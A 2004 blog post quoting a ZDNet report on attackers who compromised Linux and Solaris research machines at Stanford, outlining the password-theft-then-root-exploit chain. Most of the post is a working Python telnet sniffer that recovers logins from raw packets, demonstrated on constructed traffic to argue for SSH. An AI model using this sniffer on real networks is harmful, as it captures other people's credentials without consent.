Wednesday, April 14, 2004

ZDNet: Printer Friendly - Attackers infiltrating supercomputer networks:
"Unknown attackers have compromised a large number of Linux and Solaris machines in high-speed computing networks at Stanford University and other academic research facilities, according to an advisory.

The attacks, which apparently compromised servers as recently as April 3, are currently being investigated, according to an advisory posted April 6 by the Information Technology Systems and Services (ITSS) group at Stanford."

The attacks start with the compromise of an unprivileged local user account. Usually the attacker has captured the password somewhere else: sniffed it off the network (where cleartext protocols such as telnet are still in use), collected it when the user logged on to or from another machine that was already compromised, or harvested it from the password file of a compromised system.
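The first of those capture paths, as an added example that is not code from the Stanford advisory, the ZDNet story or this post: a small passive telnet sniffer in Python that reassembles a login from raw IPv4/TCP packets. The hosts (10.0.0.5 and 10.0.0.9), the port, the session and the password are all constructed inline for the demonstration; nothing is read from a live interface or a capture file.

```python
# Passive recovery of a telnet login from raw IPv4/TCP packets. Added example; all traffic is constructed.
import struct

TELNET_PORT = 23
IAC, SB, SE = 0xFF, 0xFA, 0xF0

def build_packet(src, sport, dst, dport, seq, payload):
    """Minimal IPv4/TCP packet (no link layer, zero checksums), for the sample session only."""
    ip = struct.pack('!BBHHHBBH4s4s', 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     bytes(map(int, src.split('.'))), bytes(map(int, dst.split('.'))))
    tcp = struct.pack('!HHIIHHHH', sport, dport, seq, 0, (5 << 12) | 0x18, 8192, 0, 0)
    return ip + tcp + payload

def parse_packet(packet):
    """Return (src, sport, dst, dport, seq, payload) for an IPv4/TCP packet, else None."""
    if len(packet) < 40 or packet[0] >> 4 != 4 or packet[9] != 6:
        return None
    ihl, total = (packet[0] & 0x0F) * 4, struct.unpack('!H', packet[2:4])[0]
    tcp = packet[ihl:total]
    if len(tcp) < 20:
        return None
    sport, dport, seq, _ack, off_flags = struct.unpack('!HHIIH', tcp[:14])
    src, dst = ('.'.join(map(str, packet[o:o + 4])) for o in (12, 16))
    return src, sport, dst, dport, seq, tcp[(off_flags >> 12) * 4:]

def strip_iac(data):
    """Drop telnet option negotiation (IAC sequences) so only typed/displayed text remains."""
    out, i = bytearray(), 0
    while i < len(data):
        if data[i] != IAC:
            out.append(data[i]); i += 1
        elif i + 1 >= len(data):
            break
        elif data[i + 1] == IAC:            # IAC IAC is an escaped 0xFF data byte
            out.append(IAC); i += 2
        elif data[i + 1] == SB:             # subnegotiation runs until IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            i = len(data) if end < 0 else end + 2
        elif 0xFB <= data[i + 1] <= 0xFE:   # WILL/WONT/DO/DONT carry an option byte
            i += 3
        else:                               # any other two-byte command
            i += 2
    return bytes(out)

def extract_telnet_logins(packets):
    """After each server login/password prompt, collect the client's keystrokes up to CR."""
    sessions, found = {}, []                 # found: [(client_ip, server_ip, username, password)]
    for raw in packets:
        p = parse_packet(raw)
        if p is None:
            continue
        src, sport, dst, dport, seq, payload = p
        if dport == TELNET_PORT:
            key, side = (src, sport, dst), 'client'
        elif sport == TELNET_PORT:
            key, side = (dst, dport, src), 'server'
        else:
            continue
        s = sessions.setdefault(key, {'field': None, 'buf': bytearray(), 'user': None, 'seen': set()})
        if (side, seq) in s['seen']:        # retransmitted segment: never count keystrokes twice
            continue
        s['seen'].add((side, seq))
        text = strip_iac(payload)
        if side == 'server':
            prompt = text.lower().rstrip()   # a prompt ends the segment; a banner line does not
            if prompt.endswith(b'password:'):
                s['field'], s['buf'] = 'pass', bytearray()
            elif prompt.endswith(b'login:'):
                s['field'], s['buf'] = 'user', bytearray()
        elif s['field'] is not None:
            for b in text:
                if b in (0x0D, 0x0A):        # telnet ends a line with CR LF or CR NUL
                    value = s['buf'].decode('latin-1')
                    if s['field'] == 'user':
                        s['user'] = value
                    else:
                        found.append((key[0], key[2], s['user'], value))
                    s['field'], s['buf'] = None, bytearray()
                    break
                if b != 0x00:
                    s['buf'].append(b)
    return found

def sample_capture():
    """Constructed session: 10.0.0.5 logs in over telnet to a Solaris host at 10.0.0.9."""
    c, s, cport, pkts, seq = '10.0.0.5', '10.0.0.9', 40001, [], {'c': 1000, 's': 5000}
    def send(side, data):                    # 'c' = client -> server, 's' = server -> client
        args = (c, cport, s, TELNET_PORT) if side == 'c' else (s, TELNET_PORT, c, cport)
        pkts.append(build_packet(*args, seq[side], data))
        seq[side] += len(data)
    send('s', bytes([IAC, 0xFD, 0x18, IAC, 0xFB, 0x01]) + b'\r\nSunOS 5.8\r\n\r\nlogin: ')
    for ch in b'jdoe':                       # one keystroke per segment, echoed by the server
        send('c', bytes([ch])); send('s', bytes([ch]))
    send('c', b'\r\x00')
    send('s', b'\r\nPassword: ')             # echo is off from here on
    for ch in b'Tr0ub4dor':
        send('c', bytes([ch]))
    pkts.append(pkts[-1])                    # the last keystroke, retransmitted
    send('c', b'\r\x00')
    send('s', b'\r\nLast login: Tue Apr 13 22:10:01 from 10.0.0.5\r\n$ ')
    return pkts
```

Calling extract_telnet_logins(sample_capture()) yields the username and password in the clear. Anyone on the same segment as the client, or on any hop in between, can do the same against real traffic; that is the whole problem with telnet, rlogin and ftp logins, and replacing them with an encrypted protocol such as SSH removes this capture path entirely. The retransmission and IAC handling are there because real captures contain both, and a naive sniffer that concatenates payloads would report a corrupted password.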

If the target machine is behind on its patches, the attacker then uses one of several public exploits to elevate the unprivileged account to root. The exploits target the Linux mremap() vulnerabilities, the Solaris kernel module loading vulnerability (for which exploit code was made public on 8 April), and a Solaris priocntl() issue. Keeping kernels patched blocks this second step, but the stolen password still gives the attacker a local foothold from which to harvest more credentials.

http://zdnet.com.com/2102-1105_2-5191024.html?tag=printthis
